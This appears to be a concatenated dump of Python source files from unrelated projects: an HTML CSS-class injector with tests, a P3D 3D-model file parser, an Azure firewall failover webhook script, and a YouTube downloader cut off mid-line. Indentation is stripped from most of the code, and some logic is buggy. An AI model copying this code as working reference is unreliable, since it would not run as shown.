'div', **{'class': 'container'}
)
return div
def get_table_styles(self):
return {
'table': 'table',
'thead': 'thead-light',
}
def get_list_styles(self):
return {
'ol': 'list-group',
'ul': 'list-group',
'li': 'list-group-item'
}
def add_form_classes(self, tag_dict: dict):
"""
Applies form classes, only difference between this and parent implementation is the addition of adding
the "input group wrapper" class
:return:
"""
for form in self.soup.find_all('form'):
input_ = None
label = None
for elem in form.children:
if elem.name == 'label':
label = elem
# See if there is a input within the label (sometimes done for radio/cb)
input_within_label = elem.find_all('input', recursive=False)
if input_within_label:
# todo handle this case
raise Warning("No support for inputs nested within labels for Bootstrap"
"for now.")
elif elem.name == 'input' or elem.name == 'select':
if input_:
raise Exception("Found input without adjacent label")
else:
input_ = elem
if elem.get('type') == 'radio':
if 'radio' in tag_dict:
self.add_class_to_element(elem, tag_dict['radio'])
elif elem.get('type') == 'checkbox':
if 'checkbox' in tag_dict:
self.add_class_to_element(elem, tag_dict['checkbox'])
else:
self.add_class_to_element(elem, tag_dict['input'])
elif elem.name == 'div':
# todo handle the case we have a prexisting div in form
raise Warning("No support yet for input elements in divs within a form")
# Add overall wrapper
if input_ and label:
if input_.get('type') == 'radio' or input_.get('type') == 'checkbox':
self.add_class_to_element(label, 'form-check-label')
field_div = self.soup.new_tag('div', **{'class': 'form-check'})
# Add label then input
input_.wrap(field_div)
field_div.append(label)
else:
field_div = self.soup.new_tag('div', **{'class': 'form-group'})
# Add label then input
label.wrap(field_div)
field_div.append(input_)
input_, label = None, None
```
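A hedged end-to-end sketch of driving the class above; 'page.html' is a placeholder for an existing HTML file, and the import path matches the package layout used by the test files later in this repo.

```python
# Hypothetical usage of BootstrapCsskrt; 'page.html' is a placeholder path.
from csskrt.scripts.bootstrapCsskrt import BootstrapCsskrt
krt = BootstrapCsskrt('page.html')   # parse an existing HTML file
krt.freshify()                       # inject Bootstrap CDN tags, wrapper div and classes
krt.output(pretty_print=True)        # writes page_csskrt.html next to the input
```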
#### File: csskrt/scripts/csskrt.py
```python
from bs4 import BeautifulSoup, Tag
import os
from abc import ABC, abstractmethod
from typing import List, Dict, NoReturn, Optional
class Csskrt(ABC):
def __init__(self, filename: str, tag_styles: Dict):
        with open(filename) as f:  # should be able to handle dirs (for later) todo
            f_data = f.read()
self.file_path = filename
self.soup = BeautifulSoup(f_data, 'html.parser')
self.tag_styles = tag_styles
@abstractmethod
def get_starter_tags(self) -> List[Tag]:
"""
Return a list of the Tags you want to add to the <head>
:return:
"""
pass
@abstractmethod
    def get_wrapper_tag(self) -> Optional[Tag]:
        """
        Return the 'wrapper' tag for your framework, or None for no wrapper.
Eg. 'container' for Bootstrap
:return:
"""
pass
@abstractmethod
def get_table_styles(self) -> Dict:
"""
Return a dictionary of the table-specific tag and the corresponding
css styles
Eg. { 'table': 'my-table-class, 'thead': 'my-thead-class' }
:return:
"""
@abstractmethod
def version(self) -> str:
"""
:return: The version number
"""
@abstractmethod
def get_list_styles(self) -> Dict:
"""
:return:
"""
def add_class_to_element(self, elem, css_class):
if not elem.get('class'):
elem['class'] = css_class
else:
try:
elem['class'].append(css_class)
except AttributeError:
elem['class'] += ' ' + css_class
def initialize_framework(self, head: Tag, tags: List[Tag]):
"""
        Applies the header tags to the head
:param head:
:param tags:
:return:
"""
for tag in tags:
head.append(tag)
def add_wrapper_tag(self, wrapper_tag: Tag):
"""
Add the container tag for the framework
:param wrapper_tag:
:return:
"""
# potentially optimize by using wrap and swapping attributes?
body_children = list(self.soup.body.children)
self.soup.body.clear()
self.soup.body.append(wrapper_tag)
for child in body_children:
wrapper_tag.append(child)
def add_form_classes(self, tag_dict: dict) -> NoReturn:
"""
Adds classes for form fields
:param tag_dict:
:return:
"""
for form in self.soup.find_all('form'):
for elem in form.children:
if elem.name == 'label':
if 'label' in tag_dict:
self.add_class_to_element(elem, tag_dict['label'])
elif elem.name == 'input':
self.add_class_to_element(elem, tag_dict['input'])
if elem.get('type') == 'radio':
if 'radio' in tag_dict:
self.add_class_to_element(elem, tag_dict['radio'])
elif elem.get('type') == 'checkbox':
if 'checkbox' in tag_dict:
self.add_class_to_element(elem, tag_dict['checkbox'])
# elif type(elem) == Tag: # ignore NavigableStrings like /n
# if tag_dict.get(elem.name):
# self.add_class_to_element(elem, tag_dict[elem.name])
def add_table_classes(self, table_tag_dict: dict) -> NoReturn:
"""
Apply the styles to table elements
Supports the following tags:
('table', 'thead', 'tbody', 'tfoot', 'tr', 'th', 'td')
:param table_tag_dict:
:return:
"""
table_keys = ('thead', 'tbody', 'tfoot', 'tr', 'th', 'td')
for table in self.soup.find_all('table'):
if table_tag_dict.get('table'): # Add style to table tag
self.add_class_to_element(table, table_tag_dict['table'])
for tk in table_keys:
if table_tag_dict.get(tk):
all_table_elems = table.find_all(tk)
for elem in all_table_elems:
self.add_class_to_element(elem, table_tag_dict[tk])
def add_list_classes(self, list_tags: dict) -> NoReturn:
"""
Supports the following tags:
('ul', 'ol', 'li')
:param list_tags:
:return:
"""
        for list_elem in self.soup.find_all(['ol', 'ul']):
            if list_elem.name == 'ul' and list_tags.get('ul'):
                self.add_class_to_element(list_elem, list_tags['ul'])
            elif list_elem.name == 'ol' and list_tags.get('ol'):
                self.add_class_to_element(list_elem, list_tags['ol'])
            if list_tags.get('li'):
                for li in list_elem.find_all('li', recursive=False):
                    # recursive=False to prevent double modifying for nested lists
                    self.add_class_to_element(li, list_tags['li'])
def add_general_classes(self):
"""
Adds styles to single elements
:return:
"""
supported_classes = (
'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'button', 'a', 'nav'
)
for tag in self.tag_styles:
if tag in supported_classes:
for elem in self.soup.find_all(tag):
self.add_class_to_element(elem, self.tag_styles[tag])
def output(self, pretty_print: bool) -> NoReturn:
"""
Outputs a new file.
:return:
"""
folder = os.path.dirname(self.file_path)
file = os.path.basename(self.file_path)
file_name, ext = os.path.splitext(file)
new_file_name = os.path.join(folder, file_name + '_csskrt' + ext)
with open(new_file_name, 'w') as out_file:
            if pretty_print:
                out_file.write(self.soup.prettify())
            else:
                out_file.write(str(self.soup))
def freshify(self) -> NoReturn:
"""
Main function that applies all the necessary styles
:return:
"""
starter_tags = self.get_starter_tags()
wrapper_tag = self.get_wrapper_tag()
table_styles = self.get_table_styles()
list_styles = self.get_list_styles()
# Modify the head
if self.soup.head:
self.initialize_framework(self.soup.head, starter_tags)
# Add the "wrapper" tag
if wrapper_tag:
self.add_wrapper_tag(wrapper_tag)
# Elements that have children eg. tables, lists, forms have their own
# dedicated function to support complex operations if necessary.
self.add_form_classes(self.tag_styles)
self.add_list_classes(list_styles)
self.add_table_classes(table_styles)
# Add styles for the rest of the elements
self.add_general_classes()
return self.soup
```
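Since Csskrt is abstract, support for another CSS framework is added by subclassing it and filling in the hooks. The sketch below is illustrative only: the AcmeCsskrt class, the acme-* class names and the stylesheet URL are invented, not a real framework.

```python
# Illustrative-only subclass showing which hooks a new framework must implement.
from typing import Dict, List
from bs4 import Tag
from csskrt.scripts.csskrt import Csskrt
class AcmeCsskrt(Csskrt):
    def __init__(self, filename: str):
        # 'acme-*' classes are invented placeholders, not a real framework
        super().__init__(filename, {'button': 'acme-btn', 'input': 'acme-input'})
    def version(self) -> str:
        return 'v0.1'
    def get_starter_tags(self) -> List[Tag]:
        # only a stylesheet link; real frameworks usually add meta tags too
        return [self.soup.new_tag('link', rel='stylesheet',
                                  href='https://example.com/acme.min.css')]
    def get_wrapper_tag(self):
        return self.soup.new_tag('div', **{'class': 'acme-container'})
    def get_table_styles(self) -> Dict:
        return {'table': 'acme-table'}
    def get_list_styles(self) -> Dict:
        return {'ul': 'acme-list', 'li': 'acme-list-item'}
```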
#### File: csskrt-csskrt/test/test_bootstrap.py
```python
import sys, os
import copy
import pytest
from bs4 import BeautifulSoup
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from csskrt.scripts.bootstrapCsskrt import BootstrapCsskrt
@pytest.fixture()
def bootstrap_csskrt():
bs_csskrt = BootstrapCsskrt(os.path.join(os.path.dirname(__file__), 'test1.html'))
before = copy.copy(bs_csskrt.soup)
bs_csskrt.freshify()
after = bs_csskrt.soup
return before, after
class TestBootstrapButtons():
def test_compare_num_button_tags(self, bootstrap_csskrt):
before: BeautifulSoup = bootstrap_csskrt[0]
after: BeautifulSoup = bootstrap_csskrt[1]
tag = 'button'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
assert (len(old_tags) == len(new_tags))
def test_buttons_styles(self, bootstrap_csskrt):
before: BeautifulSoup = bootstrap_csskrt[0]
after: BeautifulSoup = bootstrap_csskrt[1]
tag = 'button'
style = ['btn', 'btn-primary']
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
for old_t, new_t in zip(old_tags, new_tags):
old_class = old_t.get('class', [])
new_class = new_t.get('class', [])
if type(new_class) == str: # sometimes get returns str instead of list
new_class = new_class.strip().split(' ')
assert(set(old_class).issubset(new_class))
def test_buttons_content(self, bootstrap_csskrt):
before: BeautifulSoup = bootstrap_csskrt[0]
after: BeautifulSoup = bootstrap_csskrt[1]
tag = 'button'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
for old_t, new_t in zip(old_tags, new_tags):
assert old_t.get_text() == new_t.get_text()
class TestBootstrapForm():
def test_number_form_tags(self, bootstrap_csskrt):
before: BeautifulSoup = bootstrap_csskrt[0]
after: BeautifulSoup = bootstrap_csskrt[1]
tag = 'form'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
assert (len(old_tags) == len(new_tags))
    def check_checkboxes(self, bootstrap_csskrt):
        before: BeautifulSoup = bootstrap_csskrt[0]
        after: BeautifulSoup = bootstrap_csskrt[1]
        tag = 'form'
        new_tags = after.find_all(tag)
        for form in new_tags:
            # find_all returns a list, so check each checkbox individually;
            # 'class' attributes come back as lists of class names
            for checkbox in form.find_all('input', type='checkbox'):
                assert 'form-check-input' in checkbox.get('class', [])
                parent = checkbox.parent
                assert parent.name == 'div' and 'form-check' in parent.get('class', [])
```
#### File: csskrt-csskrt/test/test_bulma.py
```python
import sys, os
import copy
import pytest
from bs4 import BeautifulSoup
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from csskrt.scripts.bulmaCsskrt import BulmaCsskrt
@pytest.fixture()
def bulma_csskrt():
bulma_csskrt = BulmaCsskrt(os.path.join(os.path.dirname(__file__), 'test1.html'))
before = copy.copy(bulma_csskrt.soup)
bulma_csskrt.freshify()
after = bulma_csskrt.soup
return before, after
class TestBulmaButtons():
def test_compare_num_button_tags(self, bulma_csskrt):
before: BeautifulSoup = bulma_csskrt[0]
after: BeautifulSoup = bulma_csskrt[1]
tag = 'button'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
assert (len(old_tags) == len(new_tags))
def test_buttons_styles(self, bulma_csskrt):
before: BeautifulSoup = bulma_csskrt[0]
after: BeautifulSoup = bulma_csskrt[1]
tag = 'button'
style = ['button']
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
for old_t, new_t in zip(old_tags, new_tags):
old_class = old_t.get('class', [])
new_class = new_t.get('class', [])
if type(new_class) == str: # sometimes get returns str instead of list
new_class = new_class.strip().split(' ')
assert(set(old_class).issubset(new_class))
def test_buttons_content(self, bulma_csskrt):
before: BeautifulSoup = bulma_csskrt[0]
after: BeautifulSoup = bulma_csskrt[1]
tag = 'button'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
for old_t, new_t in zip(old_tags, new_tags):
assert old_t.get_text() == new_t.get_text()
class TestBootstrapForm():
def test_number_form_tags(self, bulma_csskrt):
before: BeautifulSoup = bulma_csskrt[0]
after: BeautifulSoup = bulma_csskrt[1]
tag = 'form'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
assert (len(old_tags) == len(new_tags))
def test_select_tags(self, bulma_csskrt):
before: BeautifulSoup = bulma_csskrt[0]
after: BeautifulSoup = bulma_csskrt[1]
tag = 'form'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
for form in new_tags:
for select in form.find_all('select'):
assert(select.parent.name == 'div' and 'select' in select.parent['class'] )
assert (select.parent.parent.name == 'div' and
'control' in select.parent.parent['class'])
assert (select.parent.parent.parent.name == 'div' and
'field' in select.parent.parent.parent['class'])
``` |
{
"source": "4d4a5852/py3d",
"score": 3
} |
#### File: py3d/py3d/__init__.py
```python
import struct
import collections
def _read_asciiz(f, encoding="utf-8"):
pos = f.tell()
bts = b""
while b"\0" not in bts:
bts += f.read(1024)
bts = bts[:bts.index(b"\0")]
f.seek(pos + len(bts) + 1)
return str(bts, encoding=encoding)
class Point:
def __init__(self, f=None):
self.coords = (0,0,0)
self.flags = 0
self.mass = None
if f is not None:
self.read(f)
def read(self, f):
self.coords = struct.unpack("fff", f.read(12))
self.flags = struct.unpack("<L", f.read(4))[0]
def write(self, f):
f.write(struct.pack("fff", *self.coords))
f.write(struct.pack("<L", self.flags))
class Vertex:
def __init__(self, all_points, all_normals, f=None):
self.all_points = all_points
self.all_normals = all_normals
self.point_index = None
self.normal_index = None
self.uv = (0, 0)
if f is not None:
self.read(f)
@property
def point(self):
return self.all_points[self.point_index]
    @point.setter
    def point(self, value):
        self.point_index = self.all_points.index(value)
    @property
    def normal(self):
        return self.all_normals[self.normal_index]
    @normal.setter
    def normal(self, value):
        self.normal_index = self.all_normals.index(value)
def read(self, f):
self.point_index = struct.unpack("<L", f.read(4))[0]
self.normal_index = struct.unpack("<L", f.read(4))[0]
self.uv = struct.unpack("ff", f.read(8))
def write(self, f):
f.write(struct.pack("<L", self.point_index))
f.write(struct.pack("<L", self.normal_index))
f.write(struct.pack("ff", *self.uv))
class Face:
def __init__(self, all_points, all_normals, f=None):
self.all_points = all_points
self.all_normals = all_normals
self.vertices = []
self.flags = 0
self.texture = ""
self.material = ""
if f is not None:
self.read(f)
def read(self, f):
num_vertices = struct.unpack("<L", f.read(4))[0]
assert num_vertices in (3,4)
self.vertices = [Vertex(self.all_points, self.all_normals, f) for i in range(num_vertices)]
if num_vertices == 3:
f.seek(16, 1)
self.flags = struct.unpack("<L", f.read(4))[0]
self.texture = _read_asciiz(f)
self.material = _read_asciiz(f)
def write(self, f):
f.write(struct.pack("<L", len(self.vertices)))
for v in self.vertices:
v.write(f)
if len(self.vertices) == 3:
f.write(b"\0" * 16)
f.write(struct.pack("<L", self.flags))
f.write(bytes(self.texture, encoding="utf-8") + b"\0")
f.write(bytes(self.material, encoding="utf-8") + b"\0")
class Selection:
def __init__(self, all_points, all_faces, f=None):
self.all_points = all_points
self.all_faces = all_faces
self.points = {}
self.faces = {}
if f is not None:
self.read(f)
def read(self, f):
num_bytes = struct.unpack("<L", f.read(4))[0]
data_points = f.read(len(self.all_points))
data_faces = f.read(len(self.all_faces))
self.points = {p: (lambda weight: weight if weight <= 1 else 1 - ((weight - 1) / 255))(data_points[i]) for i, p in enumerate(self.all_points) if data_points[i] > 0}
self.faces = {fa: (lambda weight: weight if weight <= 1 else 1 - ((weight - 1) / 255))(data_faces[i]) for i, fa in enumerate(self.all_faces) if data_faces[i] > 0}
def write(self, f):
f.write(struct.pack("<L", len(self.all_points) + len(self.all_faces)))
data_points = [(lambda weight: weight if weight in (1,0) else round((1 - weight) * 255) + 1)(self.points[p]) if p in self.points else 0 for p in self.all_points]
f.write(bytes(data_points))
data_faces = [(lambda weight: weight if weight in (1,0) else round((1 - weight) * 255) + 1)(self.faces[fa]) if fa in self.faces else 0 for fa in self.all_faces]
f.write(bytes(data_faces))
class LOD:
def __init__(self, f=None):
self.version_major = 28
self.version_minor = 256
self.resolution = 1.0
self.points = []
self.facenormals = []
self.faces = []
self.sharp_edges = []
self.properties = collections.OrderedDict()
self.selections = collections.OrderedDict()
if f is not None:
self.read(f)
@property
def mass(self):
masses = [x.mass for x in self.points]
if len([x for x in masses if x is not None]) == 0:
return None
return sum(masses)
@property
def num_vertices(self):
return sum([len(x.vertices) for x in self.faces])
def read(self, f):
assert f.read(4) == b"P3DM"
self.version_major = struct.unpack("<L", f.read(4))[0]
self.version_minor = struct.unpack("<L", f.read(4))[0]
num_points = struct.unpack("<L", f.read(4))[0]
num_facenormals = struct.unpack("<L", f.read(4))[0]
num_faces = struct.unpack("<L", f.read(4))[0]
f.seek(4, 1)
self.points.extend([Point(f) for i in range(num_points)])
self.facenormals.extend([struct.unpack("fff", f.read(12)) for i in range(num_facenormals)])
self.faces.extend([Face(self.points, self.facenormals, f) for i in range(num_faces)])
assert f.read(4) == b"TAGG"
while True:
f.seek(1, 1)
taggname = _read_asciiz(f)
if taggname[0] != "#":
self.selections[taggname] = Selection(self.points, self.faces, f)
continue
num_bytes = struct.unpack("<L", f.read(4))[0]
data = f.read(num_bytes)
if taggname == "#EndOfFile#":
break
if taggname == "#SharpEdges#": #untested
self.sharp_edges.extend([struct.unpack("<LL", data[i*8:i*8+8]) for i in range(int(num_bytes / 8))])
continue
if taggname == "#Property#": #untested
assert num_bytes == 128
k, v = data[:64], data[64:]
assert b"\0" in k and b"\0" in v
k, v = k[:k.index(b"\0")], v[:v.index(b"\0")]
self.properties[str(k, "utf-8")] = str(v, "utf-8")
continue
if taggname == "#Mass#":
assert num_bytes == 4 * num_points
for i in range(num_points):
self.points[i].mass = struct.unpack("f", data[i*4:i*4+4])[0]
continue
#if taggname == "#Animation#": #not supported
# pass
#if taggname == "#UVSet#": #ignored, data from lod faces used
# pass
self.resolution = struct.unpack("f", f.read(4))[0]
def write(self, f):
f.write(b"P3DM")
f.write(struct.pack("<L", self.version_major))
f.write(struct.pack("<L", self.version_minor))
f.write(struct.pack("<L", len(self.points)))
f.write(struct.pack("<L", len(self.facenormals)))
f.write(struct.pack("<L", len(self.faces)))
f.write(b"\0" * 4)
for p in self.points:
p.write(f)
for fn in self.facenormals:
f.write(struct.pack("fff", *fn))
for fa in self.faces:
fa.write(f)
f.write(b"TAGG")
if len(self.sharp_edges) > 0: #untested
f.write(b"\x01")
f.write(b"#SharpEdges#\0")
f.write(struct.pack("<L", len(self.sharp_edges) * 8))
for se in self.sharp_edges:
f.write(struct.pack("<LL", *se))
for k, v in self.selections.items():
f.write(b"\x01")
f.write(bytes(k, "utf-8") + b"\0")
v.write(f)
for k, v in self.properties.items():
f.write(b"\x01")
f.write(b"#Property#\0")
f.write(struct.pack("<L", 128))
f.write(struct.pack("64s64s", bytes(k, "utf-8"), bytes(v, "utf-8")))
if self.mass is not None:
f.write(b"\x01")
f.write(b"#Mass#\0")
f.write(struct.pack("<L", len(self.points) * 4))
for p in self.points:
f.write(struct.pack("f", p.mass))
if len(self.faces) > 0:
f.write(b"\x01")
f.write(b"#UVSet#\0")
f.write(struct.pack("<L", self.num_vertices * 8 + 4))
f.write(b"\0\0\0\0")
for fa in self.faces:
for v in fa.vertices:
f.write(struct.pack("ff", *v.uv))
f.write(b"\x01")
f.write(b"#EndOfFile#\0")
f.write(b"\0\0\0\0")
f.write(struct.pack("f", self.resolution))
class P3D:
def __init__(self, f=None):
self.lods = []
if f is not None:
self.read(f)
def read(self, f):
assert f.read(4) == b"MLOD"
version = struct.unpack("<L", f.read(4))[0]
num_lods = struct.unpack("<L", f.read(4))[0]
self.lods.extend([LOD(f) for i in range(num_lods)])
def write(self, f):
f.write(b"MLOD")
f.write(struct.pack("<L", 257))
f.write(struct.pack("<L", len(self.lods)))
for l in self.lods:
l.write(f)
``` |
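A small hedged sketch of a read/write round trip with the classes above; 'model.p3d' is a placeholder file name, and files must be opened in binary mode because the parser works with struct.

```python
# Hypothetical round trip: read an MLOD P3D, print a per-LOD summary, write a copy.
import py3d
with open('model.p3d', 'rb') as f:        # binary mode: the reader uses struct.unpack
    p3d = py3d.P3D(f)
for lod in p3d.lods:
    print(lod.resolution, len(lod.points), len(lod.faces), lod.mass)
with open('model_copy.p3d', 'wb') as f:
    p3d.write(f)
```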
{
"source": "4D5A/ngf-automation",
"score": 3
} |
#### File: powershell/multisubudrupdate/call_udr_webhook.py
```python
import os
import logging
import re
import ConfigParser
import json
import commands
import time
logger = logging.getLogger(__name__)
#Parsing config files for the NGF network needs to only read the boxnet
#configuration
def read_boxnet(filename,confsec):
import StringIO
boxnet = StringIO.StringIO()
boxnet.write("[" + confsec + "]\n")
try:
with open(filename) as infile:
copy = False
for line in infile:
if line.strip() == "[" + confsec + "]":
copy = True
elif line.strip() == "":
copy = False
elif copy:
boxnet.write(str(line))
except IOError:
logging.warning("Unable to open config file" + filename)
exit()
boxnet.seek(0, os.SEEK_SET)
#print boxnet.getvalue()
return boxnet
def get_boxip(confpath, conffile,section='boxnet'):
boxconf = ConfigParser.ConfigParser()
boxconf.readfp(read_boxnet(confpath + conffile,section))
foundip = boxconf.get(section,'IP')
logger.info("Collecting the box IP from: " + conffile + " from section: " + section + " and IP found is: " + foundip)
return foundip
def call_webhook(url, subid, id, boxip, haip):
try:
import requests
except ImportError:
requests = None
import urllib2
import ssl
#print url
payload = '[{"SubscriptionId":"' + str(subid) + '","id":"' + str(id) + '","properties":{"OldNextHopIP":"' + str(haip) + '","NewNextHopIP":"' + str(boxip) + '"}}]'
logger.debug(payload)
#print payload
# POST with JSON
if requests:
r = requests.post(url, data=json.dumps(payload))
else:
request = urllib2.Request(url, headers={'User-Agent':'NGFPython'})
request.add_header('Content-Type', 'application/json')
try:
r = urllib2.urlopen(request, json.dumps(payload))
results = r.read()
return results
except urllib2.URLError as e:
logging.warning("URL Call failed because: " + e.message)
return 'FAILED'
def main():
from optparse import OptionParser
usage = """usage: %prog [options]
example: %prog -u http://uniquewebhookurl.com/path -s S1_UKNGFW
use of -l and -c are optional as the script already contains the default locations used by the CGF
"""
parser = OptionParser(usage=usage)
loglevels = ['CRITICAL', 'FATAL', 'ERROR', 'WARNING', 'WARN', 'INFO', 'DEBUG', 'NOTSET']
parser.add_option("-v", "--verbosity", default="info",
help="available loglevels: %s [default: %%default]" % ','.join(l.lower() for l in loglevels))
parser.add_option("-u", "--webhookurl", default='', help="URL of automation webhook")
parser.add_option("-c", "--configpath", default='/opt/phion/config/active/', help="source path of log files to upload")
parser.add_option("-l", "--logfilepath", default='/phion0/logs/update_UDR.log', help="logfile path and name")
parser.add_option("-s", "--servicename", default='S1_NGFW', help="name of the NGFW service with server prepended")
parser.add_option("-i", "--secondip", default='', help="name of second NIC ip address")
parser.add_option("-n", "--vnetname", default='NGF', help="name of virtual network used for ASM")
parser.add_option("-d", "--down", default='', help="to handle split brain have the CGF call with this added. So it triggers on stop too.")
# parse argsbox
(options, args) = parser.parse_args()
if options.verbosity.upper() in loglevels:
options.verbosity = getattr(logging,options.verbosity.upper())
logger.setLevel(options.verbosity)
else:
parser.error("invalid verbosity selected. please check --help")
logging.basicConfig(filename=options.logfilepath,format="%(asctime)s %(levelname)-7s - %(message)s")
servicename = options.servicename
confpath = options.configpath
#collects the VNET ID if provided
vnetname = str(options.vnetname)[1:-1]
logger.info("VNETName" + str(vnetname))
    logger.info("The script has been triggered with the stop/down option set to: " + str(options.down))
loopnum = 1
    #Creates a loop so that if this fails it will repeat the attempt, will stop
    #after 5 attempts
condition = True
while condition:
        #increases the wait period between loops: the 1st iteration sleeps 30 seconds,
        #the 2nd 60 seconds, the 3rd 90 seconds, and so on up to the final (5th)
        #iteration's 150 second delay.
sleeptime = 30 * loopnum
logger.info("UDR Webhook script triggered, iteration number:" + str(loopnum))
        #Gets the configuration files for HA
#The boxip is the IP taken from the local network config file. On failover
#this should be the IP of the active box.
boxip = get_boxip(confpath,'boxnet.conf')
if len(boxip) < 5:
logger.warning("Wasn't able to collect boxip from " + confpath)
exit()
#New section to address dual NIC boxes where second IP is needed
if len(options.secondip) > 1:
secondboxip = get_boxip(confpath,'boxnet.conf','addnet_' + options.secondip)
if len(boxip) < 5:
logger.warning("Wasn't able to collect second boxip from " + confpath)
exit()
#The boxip is the IP taken from the ha network config file. Clusters reverse
#this pair of files so this should be the other box.
haip = get_boxip(confpath,'boxnetha.conf')
if len(haip) < 5:
logger.warning("Wasn't able to collect HA boxip from " + confpath)
exit()
#New section to address dual NIC boxes where second IP is needed
if len(options.secondip) > 1:
secondhaip = get_boxip(confpath,'boxnetha.conf','addnet_' + options.secondip)
if len(boxip) < 5:
logger.warning("Wasn't able to collect HA second boxip from " + confpath)
exit()
cloudconf = ConfigParser.ConfigParser()
#opens the config file for cloud integration and creates a dummy section
with open(confpath + 'cloudintegration.conf', 'r') as f:
config_string = '[dummy_section]\n' + f.read()
#creates a temp file for conf parser to read that contains the dummy section
#header.
with open('/tmp/cloud.conf', 'a') as the_file:
the_file.write(config_string)
#ConfigParser reads in from the temp file with the dummy section at the top
try:
cloudconf.read('/tmp/cloud.conf')
except ConfigParser.ParsingError:
pass
#Check that we have the sections before we find the subscription
        if cloudconf.sections():
subid = cloudconf.get('azure','SUBSCRIPTIONID')
#Check that the subscription makes sense.
if len(str(subid)) < 20:
logger.warning("Wasn't able to collect a valid subscription id from " + confpath)
exit()
else:
logger.info("Collected the Azure subscription ID")
#cleans up the temp conf file.
os.remove('/tmp/cloud.conf')
logger.info("Service Status:" + str(commands.getoutput('ps -fC ' + servicename)))
#if the box is the active unit then proceeds to push failover towards this
#boxes IP.
if(commands.getoutput('ps -fC ' + servicename).find(servicename) != -1):
#pauses between loops , this is at the front to allow some margin
#on trigger
#for temporary Azure network losses which are sometimes seen.
logger.info("Sleeping for " + str(sleeptime))
time.sleep(sleeptime)
logger.info("This NGF has been detected as active, failing over to this box IP " + boxip)
logger.info("Calling the Webhook on :" + str(options.webhookurl))
webhook = call_webhook(options.webhookurl, str(subid)[2:-2], vnetname, boxip, haip)
logger.info(webhook)
if (webhook != 'FAILED'):
condition = False
if (json.loads(webhook)['JobIds']):
logger.info("Success JobID:" + (str(json.loads(webhook)['JobIds'])[2:-2]))
else:
logger.warning("failure to get status from webhook:" + webhook)
if len(options.secondip) > 1:
logger.info("Second IP address provided and found")
if(options.down):
webhook = call_webhook(options.webhookurl, "secondnic", vnetname, secondhaip, secondboxip)
else:
webhook = call_webhook(options.webhookurl, "secondnic", vnetname, secondboxip, secondhaip)
logger.info("Calling the Webhook on :" + str(options.webhookurl))
if (json.loads(webhook)['JobIds']):
logger.info("Success JobID:" + (str(json.loads(webhook)['JobIds'])[2:-2]))
else:
logger.warning("failure to get status from webhook:" + webhook)
#If this is the 5th loop or if the webhook is successful then stops the
#loop condition being true
if (loopnum == 5):
condition = False
loopnum+=1
else:
if(options.down == "YES"):
logger.info("This box is not the active unit, but script was triggered under down condition. Failing over to the other boxes IP " + haip)
webhook = call_webhook(options.webhookurl, str(subid)[2:-2], vnetname, haip, boxip)
if (webhook != 'FAILED'):
condition = False
if (json.loads(webhook)['JobIds']):
logger.info("Success JobID:" + (str(json.loads(webhook)['JobIds'])[2:-2]))
else:
logger.warning("failure to get status from webhook:" + webhook)
if len(options.secondip) > 1:
logger.info("Second IP address provided and found")
webhook = call_webhook(options.webhookurl, "secondnic", vnetname, secondhaip, secondboxip)
logger.info("Calling the Webhook on :" + str(options.webhookurl))
if (json.loads(webhook)['JobIds']):
logger.info("Success JobID:" + (str(json.loads(webhook)['JobIds'])[2:-2]))
else:
logger.warning("failure to get status from webhook:" + webhook)
#ends the loop for the down box after 2 iterations.
if (loopnum == 2):
condition = False
else:
logger.warning("This NGF has is not running as the active unit.")
condition = False
#end of loop
if __name__ == "__main__":
exit(main())
``` |
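A hedged smoke test of the config helpers above: read_boxnet() copies a single section of a multi-section file into a StringIO buffer so ConfigParser can parse it, and get_boxip() returns that section's IP value. The boxnet.conf contents below are invented sample data, not a real CGF configuration, and the snippet assumes read_boxnet/get_boxip are in scope (e.g. run from this module).

```python
# Invented sample data; assumes get_boxip() from this script is in scope.
sample = (
    "[boxnet]\n"
    "DEV = eth0\n"
    "IP = 10.0.1.4\n"
    "MASK = 24\n"
    "\n"                          # blank line ends the section for read_boxnet()
    "[addnet_second]\n"
    "IP = 10.0.2.4\n"
)
with open('/tmp/boxnet.conf', 'w') as f:
    f.write(sample)
print(get_boxip('/tmp/', 'boxnet.conf'))                   # -> 10.0.1.4
print(get_boxip('/tmp/', 'boxnet.conf', 'addnet_second'))  # -> 10.0.2.4
```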
{
"source": "4d6f5079/YoutubeDownloader",
"score": 2
} |
#### File: 4d6f5079/YoutubeDownloader/youtube_downloader.py
```python
from os import path
from tkinter.filedialog import askdirectory, askopenfile
from tkinter.ttk import Progressbar
from tkinter import Menu, messagebox
from tor_handler import TorHandler
from toplevel_window_manager import ToplevelManager
from video_quality_selector_manager import VideoQualitySelector
import threading
import youtube_dl
import tkinter as tk
import re
import logging
logging.basicConfig(
filename="logs.log",
level=logging.DEBUG,
format="%(asctime)s.%(msecs)03d %(levelname)s %(module)s - %(funcName)s: %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
root = None
TB_URL = None
TB_DESTINATION_PATH = None
BTN_START_DOWNLOAD = None
BTN_SELECT_DIR = None
BTN_DOWNLOAD_FROM_TXT = None
RIGHT_CLICK_MENU = None
PROXY_BUTTON = None
TOPLEVEL_WINDOW = None
CONVERSION_MODE_BTN = None
TOR_HANDLER = None
USING_PROXY = False
TOR_PROXY_CHECKED = -1
CONVERSION_MODE = "mp3"
USERAGENTS_FILEPATH = "./useragents.txt"
CURRENT_SCRIPT_PATH = path.abspath(path.dirname(__file__))
UNEXPCTED_ERR_MSG = "Unexpected error occurred. Please check logs for more info."
threads = []
# this regex matches youtube urls with optional 'www.' behind 'youtube'
# alternative complicated regex: ^((?:https?:)?\/\/)?((?:www|m)\.)?((?:youtube\.com|youtu.be))(\/(?:[\w\-]+\?v=|embed\/|v\/)?)([\w\-]+)(\S+)?$
YOUTUBE_URL_REGEX = re.compile("^(https?\:\/\/)?(www\.)?(youtube\.com|youtu\.?be)\/.+$")
YOUTUBE_PLAYLIST_URL_REGEX = re.compile(
